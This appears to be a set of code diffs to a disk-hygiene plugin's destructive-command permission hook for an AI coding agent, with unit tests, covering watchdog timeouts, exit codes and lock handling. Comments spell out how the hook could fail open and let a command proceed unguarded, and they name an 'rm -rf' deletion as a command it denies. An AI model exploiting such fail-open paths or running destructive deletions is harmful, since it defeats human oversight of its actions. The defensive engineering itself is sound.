-            print(json.dumps(decision(*verdict)))
+            _emit_decision(decision(*verdict))
             _emit_guard_telemetry(
                 start,
                 tool_name,
@@ -1744,12 +1920,10 @@ def _decide(command: str, tool_name: str, start: float) -> int:
 
     authority = resolve_authorized_data_root()
     if is_exact_kill_switch_probe(command):
-        print(
-            json.dumps(
-                decision(
-                    "allow",
-                    "Exact bundled disk-hygiene kill-switch probe (read-only report).",
-                )
+        _emit_decision(
+            decision(
+                "allow",
+                "Exact bundled disk-hygiene kill-switch probe (read-only report).",
             )
         )
         _emit_guard_telemetry(start, tool_name, "ok", decision_value="allow")
@@ -1760,36 +1934,30 @@ def _decide(command: str, tool_name: str, start: float) -> int:
         # that also names the engine path (#2774). `ask` keeps the ergonomic
         # win while preserving the prompt for sessions that never invoked clean.
         permission = "ask" if resolve_mode() == _MODE_ENGINE_GATE else "allow"
-        print(
-            json.dumps(
-                decision(
-                    permission,
-                    "Exact literal-form read-only supporting Bash command "
-                    "(disk-hygiene belt inspection allowlist).",
-                )
+        _emit_decision(
+            decision(
+                permission,
+                "Exact literal-form read-only supporting Bash command "
+                "(disk-hygiene belt inspection allowlist).",
             )
         )
         _emit_guard_telemetry(start, tool_name, "ok", decision_value=permission)
         return 0
     command_kind = classify_exact_engine_command(command, authority)
     if command_kind in {"scan", "preview", "handoff-verify"}:
-        print(
-            json.dumps(
-                decision(
-                    "allow",
-                    "Exact bundled disk-hygiene read-only gate invocation.",
-                )
+        _emit_decision(
+            decision(
+                "allow",
+                "Exact bundled disk-hygiene read-only gate invocation.",
             )
         )
         _emit_guard_telemetry(start, tool_name, "ok", decision_value="allow")
         return 0
     if command_kind == "apply" and enabled:
-        print(
-            json.dumps(
-                decision(
-                    "ask",
-                    "disk-hygiene is ready to apply one exact, previewed tier. Confirm this final mutation prompt only if it matches the tier and paths you just approved.",
-                )
+        _emit_decision(
+            decision(
+                "ask",
+                "disk-hygiene is ready to apply one exact, previewed tier. Confirm this final mutation prompt only if it matches the tier and paths you just approved.",
             )
         )
         _emit_guard_telemetry(start, tool_name, "ok", decision_value="ask")
@@ -1799,13 +1967,14 @@ def _decide(command: str, tool_name: str, start: float) -> int:
         if command_kind == "apply"
         else _bash_denial_guidance(authority)
     )
-    print(json.dumps(decision("deny", reason)))
+    _emit_decision(decision("deny", reason))
     _emit_guard_telemetry(start, tool_name, "blocked", decision_value="deny")
     return 0
 
 
 def main() -> int:
     start = time.perf_counter()
+    _reset_decision_state()
     # Fail-closed safety boundary (#1423): only 0 and 2 are reachable past this
     # point. The watchdog denies fast on an internal deadline instead of
     # letting a stalled syscall run toward a harness-level, non-blocking kill
@@ -1846,13 +2015,14 @@ def main() -> int:
             command = payload["tool_input"]["command"]
             if not isinstance(command, str):
                 raise TypeError("command is not text")
+            # From here the watchdog can classify what it interrupted; before
+            # this point it deliberately cannot, and denies.
+            _publish_command_for_watchdog(command)
         except (KeyError, TypeError, ValueError, json.JSONDecodeError) as exc:
-            print(
-                json.dumps(
-                    decision(
-                        "deny",
-                        f"disk-hygiene guard could not validate the shell call: {exc}",
-                    )
+            _emit_decision(
+                decision(
+                    "deny",
+                    f"disk-hygiene guard could not validate the shell call: {exc}",
                 )
             )
             _emit_guard_telemetry(
@@ -1875,6 +2045,12 @@ def main() -> int:
         # armed-but-unstarted timer is harmless.
         if watchdog is not None:
             watchdog.cancel()
+        # Clear the latch AFTER cancelling, so no live timer can observe the
+        # cleared state and re-decide a call that already has its answer. One
+        # process per decision makes this a no-op in production; it is what
+        # keeps `main` from leaking state into the next call in a test
+        # interpreter, where `_watchdog_fire` is also exercised directly.
+        _reset_decision_state()
 
 
 if __name__ == "__main__":

--- a/plugins/disk-hygiene/skills/clean/scripts/destructive_guard.py
+++ b/plugins/disk-hygiene/skills/clean/scripts/destructive_guard.py
@@ -1613,30 +1613,27 @@ _COMMAND_UNDER_DECISION: str | None = None
 _EMIT_LOCK_WAIT_SECONDS = 0.5
 
 
-def _emit_decision(payload: dict[str, object], timeout: float | None = None) -> bool:
-    """Write one decision to stdout. Returns False if nothing was written.
+def _emit_decision(payload: dict[str, object]) -> bool:
+    """Write one decision to stdout. Returns False if one was already written.
 
-    Holds ``_EMIT_LOCK`` across both the latch check and the write so the
-    watchdog thread cannot interleave its own object into a partially written
-    one (see ``_EMIT_LOCK``). ``timeout`` bounds the wait for callers that must
-    never block — see ``_EMIT_LOCK_WAIT_SECONDS``; ``None`` waits indefinitely,
-    which is correct for the main thread and only for it.
+    Holds ``_EMIT_LOCK`` across the latch check AND the write. Both halves
+    matter, for different reasons: the latch stops a second object reaching the
+    stream, and holding the lock across ``print`` is what lets the watchdog
+    thread infer, purely from having acquired the lock, that this write has
+    already returned and is therefore safe to flush (see ``_watchdog_fire``).
+
+    This waits for the lock without a timeout, which is correct for the main
+    thread and only for it: the main thread is the one whose decision this is,
+    so it has nothing to protect by giving up. The watchdog thread must never
+    call this, and does not.
     """
     global _DECISION_EMITTED
-    if timeout is None:
-        acquired = _EMIT_LOCK.acquire()
-    else:
-        acquired = _EMIT_LOCK.acquire(timeout=timeout)
-    if not acquired:
-        return False
-    try:
+    with _EMIT_LOCK:
         if _DECISION_EMITTED:
             return False
         _DECISION_EMITTED = True
         print(json.dumps(payload))
         return True
-    finally:
-        _EMIT_LOCK.release()
 
 
 def _publish_command_for_watchdog(command: str) -> None:
@@ -1810,81 +1807,136 @@ def _watchdog_fire(deadline: float) -> None:
     on an identical retry, which is the signature of contention, not of a
     command that deserved denying.
 
-    So:
+    The downgrade is available in exactly ONE situation, and every other path
+    keeps the pre-change ``exit 2``:
 
-    * a command carrying the engine marker — the only shape whose completed
-      verdict could have been ``deny`` — still denies at exit 2, unchanged;
-    * a command that provably carries no marker cannot be an engine invocation
-      by name, and its completed verdict would have been the plugin-level
-      defer. It emits ``ask`` rather than exit 2. That is strictly more
-      protective than the defer it replaces (which emits no decision at all and
-      lets the command run) and strictly less blocking than the exit 2 it
-      replaces. The residual it does not cover is the marker-free linked-alias
-      shape, which ``_engine_gate_relevant`` resolves by filesystem identity —
-      unavailable here by construction, and already an accepted residual class
-      in that function's own contract.
+    * ``engine-gate`` mode, with a command that provably carries no engine
+      marker. Only there is the completed verdict knowably the instant
+      plugin-level defer, so ``ask`` is strictly MORE protective than the
+      outcome the guard would have reached (a defer emits no decision at all
+      and lets the command run) and strictly less blocking than ``exit 2``;
+    * ``belt`` mode denies, always. Belt is the skill-frontmatter deployment,
+      where Bash is deny-by-default and ``_engine_gate_relevant`` is never
+      consulted — a marker-free ``rm -rf`` would have been DENIED there, not
+      deferred, so downgrading it to a prompt on "the host was slow" would
+      convert a deny-by-default guard into one the operator is invited to
+      wave through. Belt is also the DEFAULT (``resolve_mode`` falls back to
+      it when no ``--mode`` is passed, which is exactly what the skill
+      frontmatter does), so a mode-blind classifier fails in the unsafe
+      direction;
+    * a command carrying the engine marker denies, unchanged;
+    * a stall before the payload parsed denies: nothing was seen, so nothing
+      can be ruled out.
 
-    Fail-closed is preserved in the sense that matters: every path here still
-    DELIVERS a decision. The fail-open this guard exists to prevent is the
-    harness killing a hook that produced no ``permissionDecision`` at all
-    (``docs/adr/0004-...``), and no branch below does that.
+    EVERY OUTCOME MUST BE SELF-CARRYING OR PROVEN DELIVERED. This is the
+    constraint that shapes the branch order below, and it is easy to lose:
+    ``exit 2`` needs nothing on stdout (the deny rides the exit status;
+    ``_write_diagnostic`` uses stderr), whereas ``exit 0`` asserts that a JSON
+    object reached the host — and exit 0 carrying no JSON is read as NO
+    DECISION, so the command proceeds unguarded. Adding non-deny outcomes to
+    this callback therefore introduced a way to fail open that a deny-only
+    callback could not have: any ``exit 0`` taken while a write is merely
+    buffered, or still in progress on the main thread, discards it. Hence the
+    flush under the lock, and hence the lock-acquisition failure denying rather
+    than exiting 0.
+
+    The residual not covered is the marker-free linked-alias shape, which
+    ``_engine_gate_relevant`` resolves by filesystem identity — unavailable
+    here by construction, and already an accepted residual class in that
+    function's own contract.
+
+    The fail-open this guard exists to prevent is the harness killing a hook
+    that produced no ``permissionDecision`` at all (``docs/adr/0004-...``).
 
     Every branch below ends in exactly ONE ``os._exit`` and nothing follows it,
     so the call is terminal under a mock as well as in a real process — a test
     that patches ``os._exit`` observes one call, not the tail of the function
     running on.
     """
-    # Read the shared state under a BOUNDED wait. Failing to get the lock means
-    # the main thread is inside its own emission; it is delivering a decision,
-    # so this thread must not race a second object into the same stream.
-    acquired = _EMIT_LOCK.acquire(timeout=_EMIT_LOCK_WAIT_SECONDS)
-    command: str | None = None
-    already_emitted = False
-    if acquired:
-        try:
-            command = _COMMAND_UNDER_DECISION
-            already_emitted = _DECISION_EMITTED
-        finally:
-            _EMIT_LOCK.release()
+    deny_diagnostic = (
+        f"destructive_guard: internal deadline of {deadline:g}s exceeded; "
+        f"denying by default. Raise {_WATCHDOG_ENV_VAR} (up to "
+        f"{_WATCHDOG_MAX_SECONDS:g}s) if this guard legitimately needs longer "
+        "on this filesystem."
+    )
 
-    if not acquired or already_emitted:
-        # Either the main thread is mid-emission or it already delivered a real
-        # decision. Both mean a decision is on its way to the host, and this
-        # thread's job is to not corrupt it.
-        #
-        # The flush is load-bearing, not tidiness. `print` only BUFFERS, and
-        # `os._exit` skips the interpreter's shutdown flush entirely — exiting
-        # here without flushing would discard the decision the main thread just
-        # wrote, and exit 0 carrying no JSON is read as no decision at all, so
-        # the command proceeds unguarded. That is the precise fail-open this
-        # watchdog exists to close, reintroduced by the watchdog itself.
-        with contextlib.suppress(BaseException):
-            sys.stdout.flush()
-        os._exit(0)  # noqa: SLF001 -- hard exit is the point; see docstring
-    elif _watchdog_marker_present(command):
-        _write_diagnostic(
-            f"destructive_guard: internal deadline of {deadline:g}s exceeded; "
-            f"denying by default. Raise {_WATCHDOG_ENV_VAR} (up to "
-            f"{_WATCHDOG_MAX_SECONDS:g}s) if this guard legitimately needs longer "
-            "on this filesystem."
-        )
+    # Failing to take the lock means the main thread is INSIDE `_emit_decision`,
+    # between `json.dumps` and `print` returning. Its write has not landed, and
+    # this thread cannot make it land: `sys.stdout.flush()` from here contends
+    # for the very buffer the wedged writer holds.
+    #
+    # So this branch denies, and that is the conservative direction rather than
+    # a regression. Exit 2 is SELF-CARRYING: the deny rides the exit status and
+    # `_write_diagnostic` uses stderr, so it needs nothing on stdout. Exiting 0
+    # here would stake the decision on a write known NOT to have completed, and
+    # exit 0 carrying no JSON is read as no decision at all, which is the
+    # command proceeding unguarded. Before this watchdog gained non-deny
+    # outcomes its only exit was 2, so every outcome was self-carrying by
+    # construction; keeping exit 2 for the one state this thread cannot observe
+    # is what preserves that property now that other branches exit 0.
+    if not _EMIT_LOCK.acquire(timeout=_EMIT_LOCK_WAIT_SECONDS):
+        _write_diagnostic(deny_diagnostic)
         os._exit(2)  # noqa: SLF001 -- hard exit is the point; see docstring
-    else:
-        _emit_decision(
-            decision(
-                "ask",
-                f"disk-hygiene could not finish checking this command within "
-                f"{deadline:g}s and is asking rather than deciding. It names no "
-                f"disk-hygiene engine script, so it is not a disk-hygiene "
-                f"invocation this guard governs. Raise {_WATCHDOG_ENV_VAR} (up "
-                f"to {_WATCHDOG_MAX_SECONDS:g}s) if this host is legitimately "
-                f"slow.",
-            ),
-            timeout=_EMIT_LOCK_WAIT_SECONDS,
-        )
+        return  # unreachable in production; keeps the mocked exit terminal
+
+    # The lock is held from here to whichever `os._exit` runs. Holding it across
+    # the flush is what makes the flush safe: the main thread cannot be inside
+    # `print`, so there is no writer to contend with.
+    global _DECISION_EMITTED
+    try:
+        command = _COMMAND_UNDER_DECISION
+
+        if _DECISION_EMITTED:
+            # `_emit_decision` holds this lock across its `print`, so having
+            # acquired it proves that write returned. It may still be BUFFERED,
+            # and `os._exit` skips the interpreter's shutdown flush, so this
+            # flush is what actually delivers the main thread's decision.
+            with contextlib.suppress(BaseException):
+                sys.stdout.flush()
+            os._exit(0)  # noqa: SLF001 -- hard exit is the point; see docstring
+            return  # unreachable in production; keeps the mocked exit terminal
+
+        # MODE GATE. The `ask` downgrade rests on "the completed verdict would
+        # have been the plugin-level defer", and that holds ONLY in engine-gate
+        # mode. The skill-frontmatter registration passes no `--mode` and
+        # `resolve_mode()` defaults to `belt`, where Bash is deny-by-default and
+        # `_engine_gate_relevant` is never consulted at all — so in belt mode a
+        # marker-free `rm -rf /some/dir` would have been DENIED, not deferred.
+        # Downgrading that to `ask` would turn a deny-by-default guard into a
+        # prompt the operator is invited to approve, on nothing more than "the
+        # host was slow". Belt mode therefore keeps the pre-change outcome.
+        #
+        # `resolve_mode` reads only `sys.argv`, so it is safe on this thread
+        # under the same syscall-free rule as `_watchdog_marker_present`.
+        if resolve_mode() != _MODE_ENGINE_GATE or _watchdog_marker_present(command):
+            _write_diagnostic(deny_diagnostic)
+            os._exit(2)  # noqa: SLF001 -- hard exit is the point; see docstring
+            return  # unreachable in production; keeps the mocked exit terminal
+
+        # Engine-gate mode, provably marker-free: the completed verdict really
+        # would have been the instant plugin-level defer, so the reason below is
+        # accurate as written rather than merely plausible.
+        _DECISION_EMITTED = True
         with contextlib.suppress(BaseException):
+            print(
+                json.dumps(
+                    decision(
+                        "ask",
+                        f"disk-hygiene could not finish checking this command "
+                        f"within {deadline:g}s and is asking rather than "
+                        f"deciding. It names no disk-hygiene engine script, so "
+                        f"it is not a disk-hygiene invocation this plugin-level "
+                        f"gate governs. Raise {_WATCHDOG_ENV_VAR} (up to "
+                        f"{_WATCHDOG_MAX_SECONDS:g}s) if this host is "
+                        f"legitimately slow.",
+                    )
+                )
+            )
             sys.stdout.flush()
         os._exit(0)  # noqa: SLF001 -- hard exit is the point; see docstring
+        return  # unreachable in production; keeps the mocked exit terminal
+    finally:
+        _EMIT_LOCK.release()
 
 
 def _decide(command: str, tool_name: str, start: float) -> int:

--- a/plugins/disk-hygiene/skills/clean/scripts/destructive_guard.py
+++ b/plugins/disk-hygiene/skills/clean/scripts/destructive_guard.py
@@ -1659,8 +1659,19 @@ def _publish_command_for_watchdog(command: str) -> None:
 # the full decision path rather than the stand-down.
 _INVOCATION_TOKEN: object | None = None
 
+# The exit code `main` reached, or None if no invocation has completed. A
+# stale-token watchdog exits with THIS rather than an unconditional 0: `main`'s
+# outer `except` returns 2 having emitted nothing (the deny rides the exit
+# status, per this module's contract), and a stand-down that hard-exited 0
+# would race ahead of that return and turn the deny into exit 0 with no JSON —
+# which the host reads as no decision at all, so the command proceeds
+# unguarded. `os._exit` from the timer thread kills the whole process before
+# the main thread can reach `__main__`'s own exit, so this is the only place
+# that outcome can be preserved.
+_MAIN_RESULT: int | None = None
 
-def _reset_decision_state() -> None:
+
+def _reset_decision_state(main_result: int | None = None) -> None:
     """Clear the per-invocation emission latch.
 
     In production this module is one process per decision, so the latch would
@@ -1669,12 +1680,23 @@ def _reset_decision_state() -> None:
     suppress every decision after the first — the guard emitting nothing, which
     is the fail-open shape this module exists to prevent. Resetting at the top
     of ``main`` keeps "one decision per invocation" true in both settings.
+
+    ``main_result`` is the exit code ``main`` reached, recorded when this is
+    called from its cleanup so a stale-token watchdog can carry that outcome
+    rather than inventing one. ``None`` means "no invocation has completed",
+    which is the state at the top of ``main`` and in a test that drives
+    ``_watchdog_fire`` directly.
     """
     global _DECISION_EMITTED, _COMMAND_UNDER_DECISION, _INVOCATION_TOKEN
+    global _MAIN_RESULT
     with _EMIT_LOCK:
         _DECISION_EMITTED = False
         _COMMAND_UNDER_DECISION = None
         _INVOCATION_TOKEN = None
+        # Published in the SAME lock hold that clears the token, so a callback
+        # can never see a stale token without also seeing the outcome that
+        # made it stale.
+        _MAIN_RESULT = main_result
 
 # The `timeout` both guard registrations declare (`hooks/hooks.json` and
 # `skills/clean/SKILL.md` frontmatter). Duplicated here because a PreToolUse
@@ -1949,7 +1971,11 @@ def _watchdog_fire(deadline: float) -> None:
             # stand down.
             with contextlib.suppress(BaseException):
                 sys.stdout.flush()
-            os._exit(0)  # noqa: SLF001 -- hard exit is the point; see docstring
+            # Carry `main`'s own outcome. Defaulting to 2 when it is unknown is
+            # fail-closed: an unknown outcome is not evidence of an allow.
+            os._exit(  # noqa: SLF001 -- hard exit is the point; see docstring
+                _MAIN_RESULT if _MAIN_RESULT is not None else 2
+            )
             return  # unreachable in production; keeps the mocked exit terminal
 
         command = _COMMAND_UNDER_DECISION
@@ -2124,6 +2150,9 @@ def main() -> int:
     # declared hook `timeout` toward the harness's own non-blocking kill.
     deadline = _watchdog_seconds()
     watchdog: threading.Timer | None = None
+    # Read by the `finally` below even if the try block raises before assigning
+    # it; 2 is the fail-closed default for "we never got far enough to decide".
+    result = 2
     # Published under the lock so a callback's token check and its state read
     # are atomic with respect to `main`'s cleanup.
     global _INVOCATION_TOKEN
@@ -2164,15 +2193,18 @@ def main() -> int:
                 "blocked",
                 decision_value="deny",
             )
-            return 0
-        return _decide(command, tool_name, start)
+            result = 0
+            return result
+        result = _decide(command, tool_name, start)
+        return result
     except BaseException as exc:
         _emit_guard_telemetry(start, "", "error")
         _write_diagnostic(
             f"destructive_guard: internal error, denying by default "
             f"({type(exc).__name__}: {exc})"
         )
-        return 2
+        result = 2
+        return result
     finally:
         # `watchdog` stays None if construction itself raised; cancelling an
         # armed-but-unstarted timer is harmless.
@@ -2202,7 +2234,7 @@ def main() -> int:
         # One process per decision makes the reset a no-op in production; it is
         # what keeps `main` from leaking state into the next call in a test
         # interpreter, where `_watchdog_fire` is also exercised directly.
-        _reset_decision_state()
+        _reset_decision_state(result)
 
 
 if __name__ == "__main__":

--- a/plugins/disk-hygiene/skills/clean/scripts/test_hygiene.py
+++ b/plugins/disk-hygiene/skills/clean/scripts/test_hygiene.py
@@ -7511,6 +7511,232 @@ class GuardTests(unittest.TestCase):
         self.assertNotEqual(1, completed.returncode)
         self.assertTrue(completed.stderr.strip())
         self.assertIn("1.5", completed.stderr)
+    # --- watchdog expiry: "could not decide" is not "decided deny" (#3502) ---
+    #
+    # The deadline is WALL-CLOCK, so it measures contention as readily as it
+    # measures a stall, and this hook fires on every Bash/PowerShell call in
+    # every session — including under concurrent subagent load, where an
+    # ordinary read-only command really can cross a 10s deadline. A blanket
+    # `exit 2` there BLOCKS a command the guard would have deferred on, and the
+    # observed occurrences all succeeded on an identical retry, which is the
+    # signature of contention rather than of a command that deserved denying.
+    #
+    # These tests fix the two halves of the split: a marker-carrying command
+    # still denies (no protection is given up), a provably marker-free one asks
+    # instead of blocking. `_watchdog_marker_present` is deliberately syscall-
+    # free, because the thread it runs on exists precisely for the case where
+    # the main thread is wedged in a filesystem call.
+
+    def test_watchdog_classifier_treats_an_unseen_command_as_unsafe(self) -> None:
+        """No command seen means the stall preceded the payload; rule nothing out."""
+        self.assertTrue(guard._watchdog_marker_present(None))
+
+    def test_watchdog_classifier_clears_a_command_with_no_engine_marker(self) -> None:
+        for command in (
+            "git status --porcelain",
+            "ls -la /tmp",
+            "rg --files-with-matches TODO src",
+        ):
+            with self.subTest(command=command):
+                self.assertFalse(guard._watchdog_marker_present(command))
+
+    def test_watchdog_classifier_flags_every_engine_marker_spelling(self) -> None:
+        bundled = str(SCRIPT_DIR / "hygiene.py")
+        for command in (
+            "python3 hygiene.py apply",
+            f"python3 {bundled} apply",
+            "cd /x && ./hygiene.py apply",
+            "bash -c 'hygiene.py apply'",
+        ):
+            with self.subTest(command=command):
+                self.assertTrue(guard._watchdog_marker_present(command))
+
+    def test_watchdog_classifier_makes_no_filesystem_call(self) -> None:
+        """The classifier runs on the timer thread BECAUSE the main thread is
+        presumed wedged in a filesystem call. One that touched the filesystem
+        could wedge identically and the watchdog would never fire at all."""
+        forbidden = ("samefile", "realpath", "stat", "exists", "isfile", "isdir")
+        with ExitStack() as stack:
+            for name in forbidden:
+                target = getattr(guard.os.path, name, None)
+                if target is None:
+                    continue
+                stack.enter_context(
+                    mock.patch.object(
+                        guard.os.path,
+                        name,
+                        side_effect=AssertionError(f"{name} is a syscall"),
+                    )
+                )
+            stack.enter_context(
+                mock.patch.object(
+                    guard.os,
+                    "stat",
+                    side_effect=AssertionError("os.stat is a syscall"),
+                )
+            )
+            self.assertFalse(guard._watchdog_marker_present("git status"))
+            self.assertTrue(guard._watchdog_marker_present("python3 hygiene.py apply"))
+
+    def _fire_watchdog_in_subprocess(
+        self, preamble: str
+    ) -> subprocess.CompletedProcess[str]:
+        """Run `_watchdog_fire` for real, after `preamble` sets module state.
+
+        `_watchdog_fire` calls `os._exit`, so a subprocess is the only safe way
+        to observe its real exit status rather than a mock's record of it.
+        """
+        return subprocess.run(
+            [
+                self.python_command(),
+                "-c",
+                "import sys; sys.path.insert(0, sys.argv[1]); "
+                "import destructive_guard as guard; "
+                f"{preamble}; guard._watchdog_fire(1.5)",
+                str(SCRIPT_DIR),
+            ],
+            capture_output=True,
+            text=True,
+            timeout=30,
+        )
+
+    def test_watchdog_expiry_on_a_marker_free_command_asks_instead_of_blocking(
+        self,
+    ) -> None:
+        """The false-positive fix, observed as a real exit status.
+
+        Exit 2 is a BLOCKING deny under PreToolUse. A read-only command that
+        merely ran slowly must not receive one.
+        """
+        completed = self._fire_watchdog_in_subprocess(
+            'guard._COMMAND_UNDER_DECISION = "git status --porcelain"'
+        )
+        self.assertEqual(0, completed.returncode)
+        self.assertNotEqual(2, completed.returncode)
+        payload = json.loads(completed.stdout)
+        self.assertEqual(
+            "ask",
+            payload["hookSpecificOutput"]["permissionDecision"],
+        )
+        # A delivered decision is what keeps this fail-closed: the fail-open
+        # this guard exists to prevent is a hook producing NO decision at all.
+        self.assertEqual(
+            "PreToolUse", payload["hookSpecificOutput"]["hookEventName"]
+        )
+
+    def test_watchdog_expiry_on_an_engine_command_still_denies_at_exit_2(
+        self,
+    ) -> None:
+        """The half that must NOT change: no protection is given up."""
+        completed = self._fire_watchdog_in_subprocess(
+            'guard._COMMAND_UNDER_DECISION = "python3 hygiene.py apply"'
+        )
+        self.assertEqual(2, completed.returncode)
+        self.assertIn("internal deadline", completed.stderr)
+        self.assertEqual("", completed.stdout)
+
+    def test_watchdog_expiry_before_the_payload_parses_still_denies(self) -> None:
+        """`None` is the stdin-stall shape; it must keep denying at exit 2."""
+        completed = self._fire_watchdog_in_subprocess(
+            "guard._COMMAND_UNDER_DECISION = None"
+        )
+        self.assertEqual(2, completed.returncode)
+        self.assertIn("internal deadline", completed.stderr)
+
+    def test_watchdog_never_appends_a_second_decision_to_a_delivered_one(
+        self,
+    ) -> None:
+        """Two writers on one stdout would splice a MALFORMED JSON object.
+
+        PreToolUse reads malformed output as no decision at all, so the guard's
+        own watchdog would produce the fail-open it was added to close.
+        """
+        completed = self._fire_watchdog_in_subprocess(
+            'guard._emit_decision(guard.decision("allow", "already decided")); '
+            'guard._COMMAND_UNDER_DECISION = "git status"'
+        )
+        self.assertEqual(0, completed.returncode)
+        payload = json.loads(completed.stdout)
+        self.assertEqual(
+            "allow", payload["hookSpecificOutput"]["permissionDecision"]
+        )
+
+    def test_decision_emission_is_latched_to_exactly_one_object(self) -> None:
+        stdout = io.StringIO()
+        guard._reset_decision_state()
+        try:
+            with redirect_stdout(stdout):
+                first = guard._emit_decision(guard.decision("allow", "first"))
+                second = guard._emit_decision(guard.decision("deny", "second"))
+        finally:
+            guard._reset_decision_state()
+        self.assertTrue(first)
+        self.assertFalse(second)
+        payload = json.loads(stdout.getvalue())
+        self.assertEqual(
+            "allow", payload["hookSpecificOutput"]["permissionDecision"]
+        )
+
+    def test_a_real_stall_past_the_deadline_asks_rather_than_blocks(self) -> None:
+        """End-to-end through the REAL `threading.Timer`, not a direct call.
+
+        `_decide` is replaced with a sleep far longer than the deadline, which
+        is the shape a wedged `os.path.samefile` on a dead network path
+        produces, and the one this hook was observed taking under load.
+        """
+        program = (
+            "import json, sys, time; sys.path.insert(0, sys.argv[1]); "
+            "import destructive_guard as guard; "
+            "guard._decide = lambda *a, **k: time.sleep(60); "
+            "sys.exit(guard.main())"
+        )
+        payload = json.dumps(
+            {"tool_name": "Bash", "tool_input": {"command": "git status --porcelain"}}
+        )
+        env = dict(os.environ)
+        env[guard._WATCHDOG_ENV_VAR] = "1"
+        completed = subprocess.run(
+            [self.python_command(), "-c", program, str(SCRIPT_DIR)],
+            input=payload,
+            capture_output=True,
+            text=True,
+            timeout=45,
+            env=env,
+        )
+        self.assertEqual(0, completed.returncode)
+        self.assertNotEqual(2, completed.returncode)
+        decided = json.loads(completed.stdout)
+        self.assertEqual(
+            "ask", decided["hookSpecificOutput"]["permissionDecision"]
+        )
+
+    def test_a_real_stall_on_an_engine_command_still_denies(self) -> None:
+        program = (
+            "import json, sys, time; sys.path.insert(0, sys.argv[1]); "
+            "import destructive_guard as guard; "
+            "guard._decide = lambda *a, **k: time.sleep(60); "
+            "sys.exit(guard.main())"
+        )
+        payload = json.dumps(
+            {
+                "tool_name": "Bash",
+                "tool_input": {"command": "python3 hygiene.py apply --tier high"},
+            }
+        )
+        env = dict(os.environ)
+        env[guard._WATCHDOG_ENV_VAR] = "1"
+        completed = subprocess.run(
+            [self.python_command(), "-c", program, str(SCRIPT_DIR)],
+            input=payload,
+            capture_output=True,
+            text=True,
+            timeout=45,
+            env=env,
+        )
+        self.assertEqual(2, completed.returncode)
+        self.assertIn("internal deadline", completed.stderr)
+
+
 
 
 class DirectReadKillSwitchTests(unittest.TestCase):

--- a/plugins/disk-hygiene/skills/clean/scripts/test_hygiene.py
+++ b/plugins/disk-hygiene/skills/clean/scripts/test_hygiene.py
@@ -7904,7 +7904,7 @@ class GuardTests(unittest.TestCase):
             "guard._emit_decision(guard.decision('allow', 'main thread decided')); "
             # `main`'s cleanup: cancel (a no-op here), flush, reset.
             "sys.stdout.flush(); "
-            "guard._reset_decision_state(); "
+            "guard._reset_decision_state(0); "
             # The in-flight callback, on a thread carrying the stale token.
             "t = threading.Thread(target=guard._watchdog_fire, args=(1.5,)); "
             "t.guard_invocation_token = token; "
@@ -7939,6 +7939,68 @@ class GuardTests(unittest.TestCase):
             "a stale-token callback must stand down at exit 0, not re-decide",
         )
         self.assertNotEqual(2, completed.returncode)
+
+    def test_a_standing_down_watchdog_carries_mains_exit_code_not_zero(
+        self,
+    ) -> None:
+        """A stand-down must not convert `main`'s no-stdout deny into a proceed.
+
+        `main`'s outer `except BaseException` returns 2 having emitted NOTHING —
+        the deny rides the exit status, which is this module's stated contract
+        for exit 2. `os._exit` from the timer thread is a whole-process kill, so
+        a stand-down that exited 0 would run before the main thread could reach
+        `__main__`'s own exit and would replace that deny with exit 0 carrying
+        no JSON. The host reads that as no decision at all, and the command
+        proceeds unguarded — a fail-open introduced by the very mechanism added
+        to stop the watchdog overriding decisions.
+
+        So the stand-down carries whatever `main` actually reached.
+        """
+        for main_result, expected in ((2, 2), (0, 0)):
+            with self.subTest(main_result=main_result):
+                program = (
+                    "import sys, threading; "
+                    "sys.path.insert(0, sys.argv[1]); "
+                    "import destructive_guard as guard; "
+                    "token = object(); "
+                    "guard._INVOCATION_TOKEN = token; "
+                    # `main`'s cleanup, publishing the outcome it reached.
+                    f"guard._reset_decision_state({main_result}); "
+                    "t = threading.Thread(target=guard._watchdog_fire, args=(1.5,)); "
+                    "t.guard_invocation_token = token; "
+                    "t.start(); t.join()"
+                )
+                completed = subprocess.run(
+                    [self.python_command(), "-c", program, str(SCRIPT_DIR)],
+                    capture_output=True,
+                    text=True,
+                    timeout=60,
+                )
+                self.assertEqual(expected, completed.returncode)
+                self.assertEqual("", completed.stdout)
+
+    def test_a_standing_down_watchdog_denies_when_the_outcome_is_unknown(
+        self,
+    ) -> None:
+        """No recorded outcome is not evidence of an allow."""
+        program = (
+            "import sys, threading; "
+            "sys.path.insert(0, sys.argv[1]); "
+            "import destructive_guard as guard; "
+            "token = object(); "
+            "guard._INVOCATION_TOKEN = None; "
+            "guard._MAIN_RESULT = None; "
+            "t = threading.Thread(target=guard._watchdog_fire, args=(1.5,)); "
+            "t.guard_invocation_token = token; "
+            "t.start(); t.join()"
+        )
+        completed = subprocess.run(
+            [self.python_command(), "-c", program, str(SCRIPT_DIR)],
+            capture_output=True,
+            text=True,
+            timeout=60,
+        )
+        self.assertEqual(2, completed.returncode)
 
     def test_a_watchdog_still_decides_while_its_invocation_is_current(self) -> None:
         """The stand-down must not disarm a callback whose invocation is live.

--- a/plugins/disk-hygiene/skills/clean/scripts/test_hygiene.py
+++ b/plugins/disk-hygiene/skills/clean/scripts/test_hygiene.py
@@ -7579,22 +7579,30 @@ class GuardTests(unittest.TestCase):
             self.assertTrue(guard._watchdog_marker_present("python3 hygiene.py apply"))
 
     def _fire_watchdog_in_subprocess(
-        self, preamble: str
+        self, preamble: str, mode: str | None = "engine-gate"
     ) -> subprocess.CompletedProcess[str]:
         """Run `_watchdog_fire` for real, after `preamble` sets module state.
 
         `_watchdog_fire` calls `os._exit`, so a subprocess is the only safe way
         to observe its real exit status rather than a mock's record of it.
+
+        `mode` reaches the guard as REAL ARGV, because `resolve_mode` reads
+        `sys.argv` and the watchdog's downgrade is gated on it. `None` passes no
+        `--mode` at all, which is what the skill frontmatter does and what makes
+        `belt` the operative default.
         """
+        argv = [
+            self.python_command(),
+            "-c",
+            "import sys; sys.path.insert(0, sys.argv[1]); "
+            "import destructive_guard as guard; "
+            f"{preamble}; guard._watchdog_fire(1.5)",
+            str(SCRIPT_DIR),
+        ]
+        if mode is not None:
+            argv += ["--mode", mode]
         return subprocess.run(
-            [
-                self.python_command(),
-                "-c",
-                "import sys; sys.path.insert(0, sys.argv[1]); "
-                "import destructive_guard as guard; "
-                f"{preamble}; guard._watchdog_fire(1.5)",
-                str(SCRIPT_DIR),
-            ],
+            argv,
             capture_output=True,
             text=True,
             timeout=30,
@@ -7695,8 +7703,18 @@ class GuardTests(unittest.TestCase):
         )
         env = dict(os.environ)
